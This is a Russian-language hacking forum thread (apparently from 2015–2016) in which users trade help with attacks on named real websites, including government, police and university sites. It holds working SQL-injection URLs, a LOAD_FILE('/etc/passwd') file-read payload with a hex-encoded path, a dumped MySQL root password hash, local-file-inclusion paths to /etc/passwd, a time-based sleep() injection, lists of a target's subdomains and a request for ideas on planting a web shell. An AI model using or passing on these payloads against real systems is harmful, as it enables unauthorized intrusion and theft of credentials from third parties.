Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    280
    Likes Received:
    118
    Reputations:
    26
    Из-за Mod_Security не могу достоверно проверить, есть ли LFI
    тут _ttp://kor.dk/musik/vespa/getid3/getid3.php
    Exploit: _ttps://www.exploit-db.com/exploits/36664/
     
  2. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    239
    Likes Received:
    87
    Reputations:
    1
    Как отфильтровать сайты в burpsuite? отображать только домен и его поддомены не зависимо от https/http
    http://joxi.ru/GrqMLEyHQN0GLr
     
  3. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,805
    Likes Received:
    399
    Reputations:
    230
    #1463 DezMond™, 4 Nov 2016
    Last edited: 4 Nov 2016
  4. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,564
    Reputations:
    40
    Всем привет. Стыдно конечно спрашивать но всё же век живи, век учись

    1 -
    PHP:
    http://www.naval.iitkgp.ernet.in/menu.php?page=pagedisplay&id=mission%27+and+false+UnioN+SeLect+1,user(),3,4,5,6,7,8,9,10,11,12+--+-
    2-
    PHP:
    http://www.police.gov.bd/Police-activities.php?id=271%27+and+false+UnIoN+SeLecT+1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16++--+-
    как прочитать файл
     
  5. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,805
    Likes Received:
    399
    Reputations:
    230
    LOAD_FILE('/etc/passwd') вместо user()
     
  6. qqq1457

    qqq1457 Member

    Joined:
    13 Oct 2016
    Messages:
    33
    Likes Received:
    10
    Reputations:
    0
    1
    http://www.naval.iitkgp.ernet.in/me...file('/etc/passwd'),3,4,5,6,7,8,9,10,11,12--+
    или
    http://www.naval.iitkgp.ernet.in/me...74632F706173737764),3,4,5,6,7,8,9,10,11,12--+
    где 0x2F6574632F706173737764= hex(/etc/passwd)

    2
    нет доступа к mysql.user то есть нет возможности прочитать файл,несмотря на то что пользователь root, root'ом не является
     
  7. qqq1457

    qqq1457 Member

    Joined:
    13 Oct 2016
    Messages:
    33
    Likes Received:
    10
    Reputations:
    0
    havij видит что то http://prnt.sc/d3e4kj
    но увы mysql=4.0.27
    в ручную пока не могу составить запрос
     
  8. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,805
    Likes Received:
    399
    Reputations:
    230
    http://www.naval.iitkgp.ernet.in/me...rd),3,4,5,6,7,8,9,10,11,12+from+mysql.user--+
    root:*29EAFC3EEB29D66A3630CAA03C557B3083B2975B
    всё там нормально
     
  9. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,805
    Likes Received:
    399
    Reputations:
    230
    Это я видел. Должен быть вывод....
     
  10. qqq1457

    qqq1457 Member

    Joined:
    13 Oct 2016
    Messages:
    33
    Likes Received:
    10
    Reputations:
    0
  11. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,564
    Reputations:
    40
    Спасибо кто откликнулся.
    В первом сайте интересен запрос table_name from information_schema.tables where table_name=database()/
    в втором сайте интересней чтение файла. Сори а то что сразу не смог задать нормально вопрос.
     
  12. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    130
    Likes Received:
    9
    Reputations:
    2
    Всем привет!

    На странице есть ckeditor с возможностью загружать файлы на сервер.
    - заливать можно всё
    - имена файлов переименовывается, так что залить .htaccess не получится
    - имена после заливки известны
    - php, php3, phtml (возможно и другие, больше не пробовал, боюсь мою кучу говна скоро обнаружат) не выполняются, скачиваются
    - shtml открывается, но так же не выполняется (судя по всему там хрен что выполняется)

    Свои идеи иссякли, а останавливаться на достигнутом не хочется, так что прошу поделиться идеями, размышлениями на тему заливки рабочего шелла и т.п. вещей.
    Не уверен что с html+js можно что-то придумать, может какой perl сгодится или еще что, но в этом я уже не силен.

    Да кстати, хоть ckeditor версии 4.0.1, толку от этого нет, т.к. папка samples отсутствует.
    И еще проверил pl, чтоб наверняка, тоже понятное дело скачивается.
     
    #1472 IMMORTAL_S, 8 Nov 2016
    Last edited: 8 Nov 2016
  13. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    280
    Likes Received:
    118
    Reputations:
    26
    Помогите раскрутить LFI
    _ttp://lidodo.astro.ncu.edu.tw/2015ATITC/index.php?page=../../../etc/passwd
     
  14. ZodiaX

    ZodiaX Reservists Of Antichat

    Joined:
    7 May 2009
    Messages:
    532
    Likes Received:
    301
    Reputations:
    46
    ?page=file:///etc/passwd
     
  15. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,564
    Reputations:
    40
    Вроде как указал автор работает. Не очень понятно что требуется
     
  16. qqq1457

    qqq1457 Member

    Joined:
    13 Oct 2016
    Messages:
    33
    Likes Received:
    10
    Reputations:
    0
  17. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    831
    Likes Received:
    816
    Reputations:
    90
    _________________________
  18. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    478
    Likes Received:
    87
    Reputations:
    21
  19. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,564
    Reputations:
    40
    Неужели ты эту уязвимость раскрутил
    http://icfi.ulim.md/alltopics.php?cat=sleep(12)
    Поищи тут может найдёшь, я думаю она где-то спрятана
    ftp.ulim.md
    moodle.ulim.md
    git.ulim.md
    gw.ulim.md
    domain.ulim.md
    files.ulim.md
    redmine.ulim.md
    s.ulim.md
    vm.ulim.md
     
  20. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,564
    Reputations:
    40
    #1480 BabaDook, 10 Nov 2016
    Last edited: 10 Nov 2016
Loading...